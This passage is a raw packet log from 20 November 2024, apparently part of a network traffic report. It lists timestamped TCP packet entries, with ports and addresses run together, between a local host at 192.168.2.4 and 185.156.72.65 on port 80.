                                                                Nov 20, 2024 05:02:21.121153116 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121169090 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121185064 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121186018 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121206999 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121212006 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121212006 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121222973 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121232986 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121243954 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121257067 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121257067 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121275902 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121280909 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121298075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121314049 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121329069 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121331930 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121345043 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121361971 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121361017 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121361017 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121378899 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121393919 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121403933 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121403933 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121433973 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121434927 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121454000 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121469021 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121479988 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121484995 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121501923 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121507883 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121507883 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121519089 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121529102 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121536016 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121572971 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121572971 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121572971 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121586084 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121602058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121617079 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121632099 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121643066 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121643066 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121646881 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121663094 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121664047 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121680975 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121684074 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121696949 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121704102 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121727943 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121727943 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121738911 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121747971 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121756077 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121772051 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121784925 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121788979 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121804953 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121808052 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121808052 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121819973 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121835947 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121839046 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121839046 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121857882 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121869087 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121876955 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121898890 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121913910 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121913910 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121931076 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121938944 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121947050 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121959925 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121963024 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121980906 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121978998 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121999025 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122004032 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122019053 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122019053 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122042894 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122044086 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122061014 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122076035 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122091055 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122095108 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122095108 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122107029 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122123003 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122123957 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122123957 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122138023 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122160912 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122162104 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122183084 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122185946 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122204065 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122227907 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122237921 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122248888 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122256041 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122272015 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122283936 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122292995 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122309923 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122309923 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122309923 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122327089 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122329950 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122343063 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122348070 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122359991 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122375011 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122390032 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122394085 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122394085 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122406006 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122416019 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122422934 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122437954 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122452021 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122453928 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122469902 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122473955 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122484922 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122493982 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122502089 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122513056 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122519016 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122535944 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122539997 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122550964 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122565031 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122565985 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122565031 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122581959 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122590065 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122597933 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122612953 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122613907 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122627974 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122633934 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122644901 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122658968 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122659922 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122677088 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122679949 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122692108 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122703075 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122709036 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122725010 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122725964 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122744083 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122747898 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122760057 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122775078 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122776985 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122790098 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122802019 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122802019 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122807026 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122821093 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122823000 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122839928 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122848988 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122848988 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122855902 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122869015 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122872114 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122888088 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122888088 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122903109 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122911930 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122911930 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122919083 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122931957 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122936010 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122951031 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122951984 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122968912 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122977972 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122977972 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122984886 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123002052 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123013020 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123013020 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123018026 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123033047 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123034954 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123051882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123059988 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123059988 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123068094 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123080015 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123085022 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123100996 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123100042 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123117924 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123126984 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123126984 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123135090 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123147011 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123152018 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123167038 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123168945 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123186111 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123193979 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123193979 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123203039 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123213053 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123219013 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123230934 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123235941 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123250961 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123255014 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123270988 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123277903 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123277903 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123286009 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123302937 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123303890 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123303890 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123330116 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123339891 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123341084 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123347998 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123366117 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123379946 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123395920 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123405933 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123406887 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123406887 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123409986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123426914 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123436928 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123445034 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123452902 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123461008 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123476982 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123478889 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123497963 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123522997 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123523951 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.341736078 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.341792107 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.400964022 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.401072979 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.405936956 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.405955076 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.405970097 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.405988932 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406048059 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406048059 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406109095 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406125069 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406140089 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406152010 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406156063 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406176090 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406181097 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406181097 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406193018 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406203032 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406208992 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406227112 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406227112 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406249046 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406256914 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406275034 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406289101 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406303883 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406306982 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406306982 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406320095 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406327009 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406337976 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406347990 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406371117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406371117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406378031 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406394005 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406408072 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406420946 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406423092 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406440020 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406449080 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406449080 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406459093 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406470060 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406475067 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406497955 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406497955 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406516075 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406527042 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406559944 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406574011 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406589031 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406603098 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406605005 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406603098 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406621933 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406627893 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406639099 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406655073 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406655073 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406677961 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406689882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406713963 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406728983 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406732082 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406744957 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406749964 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406760931 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406775951 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406775951 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406780958 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406796932 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406801939 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406812906 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406816959 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406840086 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406860113 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406860113 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406877041 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406893015 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406900883 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406908989 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406922102 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406924963 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406948090 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406948090 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406969070 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406972885 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406985044 CET8049730185.156.72.65192.168.2.4
